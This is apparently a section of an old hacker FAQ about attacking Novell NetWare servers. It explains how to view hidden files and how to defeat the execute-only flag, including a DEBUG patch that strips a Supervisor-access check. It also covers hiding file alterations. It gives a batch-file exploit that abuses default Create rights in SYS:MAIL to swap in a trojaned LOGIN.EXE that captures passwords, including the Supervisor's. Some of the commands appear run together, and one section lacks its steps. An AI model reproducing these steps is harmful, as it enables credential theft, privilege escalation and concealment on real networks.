|
03-1. How can I see hidden files and directories?
03-2. How do I defeat the execute-only flag?
03-3. How can I hide my presence after altering files?
03-4. What is a Netware-aware trojan?
03-5. What are Trustee Directory Assignments?
03-6. Are there any default Trustee Assignments that can be exploited?
03-7. What are some general ways to exploit Trustee Rights?
Section 03
Instead of a normal DIR command, use NDIR to see hidden files and directories. NDIR *.* /S /H will show you just Hidden and System files.
If a file is flagged as execute-only, it can still be opened. Open the file with a program that will read in executables, and do a Save As to another location.
Also try X-AWAY.EXE to remove this flag since Novell's FLAG.EXE won't. But once again X-AWAY.EXE requires Supervisor access.
To disable the check for Supe access in X-AWAY, try the following:
REN X-AWAY.EXE WORK
DEBUG WORK
EB84 EB
W
Q
REN QORK X-AWAY.EXE
Hey presto, anybody can copy X flagged files. The only catch is you need practically full rights in the directory where the X flagged files resides.
The best way is to use Filer. Here are the steps for removing file alterations -
While you can hit F1 will in Filer and get all the context-sensitive help you need, the quicky way to get where you're going is to run Filer in the target file's directory, select Directory Contents, highlight the target file and hit enter, select File Options and then View/Set File Information.
View and edit to your heart's desire.
A Netware-aware trojan is a program that supposedly does one thing but does another instead, and does it using Netware API calls. I have never personally encountered one, but here is how they would work.
Once activated the trojan could also erase itself since it is no longer needed.
The LAN God has pointed out quite correctly that Trustee Directory Assignments are the most misunderstood and misconfigured portion of Novell Netware. Typically a secure site should have Read and File Scan only in most directories, and should not have any rights on the root directory of any volume. Rights assigned via the Trustee Directory Assignments filter down the directory tree, so if a user has Write access at the root directory, that user has Write access in every subdirectory below it (unless explicitly limited in a subdirectory down stream).
And these assignments are not located in the bindery, but on each volume.
The following is a brief description of Trustees and Trustee Directory Assignments cut and pasted from the unofficial comp.os.netware.security FAQ:
[quote]
A trustee is any user or group that has been granted access rights in a directory. The access rights in Novell NetWare 2 are slightly different from the ones in NetWare 3.
The following is a summary of access rights for NetWare 3.
S - Supervisory. Any user with supervisory rights in a directory will automatically inherit all other rights, regardless of whether they have been explicitly granted or not. Supervisor equivalent accounts will hold this access right in every directory.
R - Read. Enables users to read files.
C - Create. Enables users to create files and directories. Unless they also have write access, they will not be able to edit files which have been created.
W - Write. Enables users to make changes to files. Unless they also have create access, they may not be able to edit files, since the write operation can only be used to extend files (not truncate them, which file editors need to do).
E - Erase. Enable users to erase files and remove directories.
M - Modify. Enable users to modify file attributes.
F - File scan. Enables users to see file and directory information. If a user does not have file scan rights, they will not see any evidence of such files existing.
A - Access control. Enable user to change trustee rights. They will be able to add other users as trustees, remove trustees, and grant/revoke specific rights from users. The only caveat of access control is that it is possible for users to remove themselves (as trustees) from directories, thus losing all access control. In addition to trustees and access rights, there is a concept of inherited rights which means that users inherit rights from parent directories. For example, if user ALICE has rights [CWEM] in a directory, and she has [RF] rights in the parent directory then she will have [RCWEMF] rights as a result of the inherited rights. This will only work if one of the rights that ALICE has in the two directories is granted to a group; if both are granted to her, she will lose the rights of the parent.
[end quote]
Yes. By default the group EVERYONE has Create rights in SYS:MAIL. This means the user (including GUEST) has the ability to write files to any subdirectory in SYS:MAIL. The first versions of Netware included a simple e-mail package, and every user that is created gets a subdirectory in mail with RCWEMF, named after their object ID number. One consistent number is the number 1, which is always assigned to Supervisor. Here's one way to exploit it:
@ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL \MAIL\C0003043\PROP -C > NUL
MAP DISPLAY OFF MAP ERRORS OFF MAP G:=SYS: DRIVE G: COMMAND /C #\MAIL\1\BOMB DRIVE F: MAP DELETE G:
TYPE BOMB.BAT > \MAIL\1\BOMB.BAT TYPE LOGIN > \MAIL\1\LOGIN
The next time the Supervisor logs in the LOGIN.EXE is replaced and the PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the passwords, and then once you have all the passwords you need (including Supervisor) delete your LOGIN and BOMB.BAT file.
Admins can defeat this by creating default personal Login Scripts or by adding an EXIT command to the end of the System Login Script. Later versions of Netware create a zero-length LOGIN file at ID creation time in the SYS:MAIL directories to defeat this.
[SRWCEMFA] | means you have FULL rights. They are all eight of the effective rights flags. |
[Sxxxxxxx] | shouldn't appear unless you are supervisor (or equivalent). It means you have full access in that directory and all subdirectories. You cannot be excluded from any directory, even if a user explicitly tries to revoke your access in a subdirectory. |
[xxxxxxxA] | is next best thing to the S right. It means you have access control in that directory and all subdirectories. You can have your access control (along with any other rights) revoked in a subdirectory, but you can always use inherited rights to recover them (see the c.o.n.s FAQ). |
[ R F ] | is what users should have in directories containing software. You have the right to read files only. |
[ RCWEMFx] | is what users should have in their home directory. You can read, create, and edit files. If you find any unusual directories with these rights, they can also be used for storing files (maybe an abuse of the network, especially if this is exploited to avoid quota systems). |
[ RxW F ] | usually means that the directory is used for keeping log files. Unless you have the C right, it may not be possible to edit files in this directory. |
The RIGHTS commands tells you what rights you have in a particular directory. GRANT, REVOKE, and REMOVE are used to set trustee rights.